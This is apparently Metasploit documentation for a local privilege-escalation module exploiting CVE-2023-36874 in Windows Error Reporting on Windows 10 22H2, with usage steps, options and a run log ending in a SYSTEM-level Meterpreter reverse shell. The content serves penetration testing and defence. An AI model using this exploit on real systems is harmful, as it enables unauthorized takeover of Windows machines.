## Vulnerable Application
This module works only on Windows 10x64 22H2

### Introduction

This module takes advantage of a bug in the way Windows Error Reporting opens the report
parser.  When a report is opened, Windows uses a relative path to locate the rendering program.
By creating a specific alternate directory structure, we can coerce Windows into opening an
arbitrary executable as SYSTEM.

If the current user is a local admin, the system will attempt impersonation and the exploit will
fail.

This module will attempt to delete the payload it uploads and the directory structure it
creates.  Because the payload is placed in a directory this module creates, after successful
exploitation the user will need to delete the payload and the directories containing it
manually if that cleanup does not complete.

## Installation Instructions
1. Install Windows 10x64 22H2
1. Create a standard user


## Verification Steps

1. Create a session on the target system under the context of a user who is not a local administrator.
1. Begin interacting with the module: `use exploit/windows/local/win_error_cve_2023_36874`.
1. Set the `PAYLOAD` and configure it correctly.
1. If an existing handler is configured to receive the elevated session, then the module's
   handler should be disabled: `set DisablePayloadHandler true`.
1. Make sure that the `SESSION` value is set to the existing session identifier.
1. Invoke the module: `run`.


## Options

### EXPLOIT_NAME

The filename to use for the exploit binary (%RAND%.exe by default).

### REPORT_DIR

The Error Directory to use (%RAND% by default).

### REPORT_NAME

The Error report name (%RAND% by default).

### SHADOW_DRIVE

The directory to place in the home drive for the pivot (%TEMP% by default).

### EXECUTE_DELAY

The number of seconds to delay between file upload and exploit launch.  Default is 3.

## Scenarios

### Windows 10.0.19045.2006 x64 (Windows 10x64 22H2)

```
msf6 exploit(windows/local/win_error_cve_2023_36874) > run

[*] Started reverse TCP handler on 10.5.135.201:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] OS version: Windows 10+ Build 19045
[+] The target appears to be vulnerable.
[*] Shadow Path = C:\NpIWBsCJozK
[*] Attempting to PrivEsc on DESKTOP-V413087 via session ID: 1
[*] C:\ProgramData
[*] Creating C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*] Creating directory C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*] C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
[*] Writing Report to C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
[*] Creating directory C:\NpIWBsCJozK
[*] C:\NpIWBsCJozK created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\
[*] C:\NpIWBsCJozK\ProgramData\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\ created
[*] Creating directory C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*] C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport created
[*] Writing bad Report to C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport\Report.wer
[*] Creating C:\NpIWBsCJozK\system32
[*] Creating directory C:\NpIWBsCJozK\system32
[*] C:\NpIWBsCJozK\system32 created
[*] Writing payload to C:\NpIWBsCJozK\system32\wermgr.exe
[*] shadow_path = NpIWBsCJozK
[*] Exploit uploaded on DESKTOP-V413087 to C:\NpIWBsCJozK\fShpLfYh.exe
[*] Sending stage (200774 bytes) to 10.5.132.118
[+] Deleted C:\ProgramData\Microsoft\Windows\WER\ReportArchive\MyReport
[*] 
[+] Deleted C:\NpIWBsCJozK\ProgramData\Microsoft\Windows\WER\ReportArchive\
[*] Meterpreter session 2 opened (10.5.135.201:4444 -> 10.5.132.118:62415) at 2023-09-19 15:43:02 -0500
[-] Failed to delete C:\NpIWBsCJozK\system32: stdapi_fs_delete_dir: Operation failed: The directory is not empty.

meterpreter > sysinfo
Computer        : DESKTOP-V413087
OS              : Windows 10 (10.0 Build 19045).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > exit

```
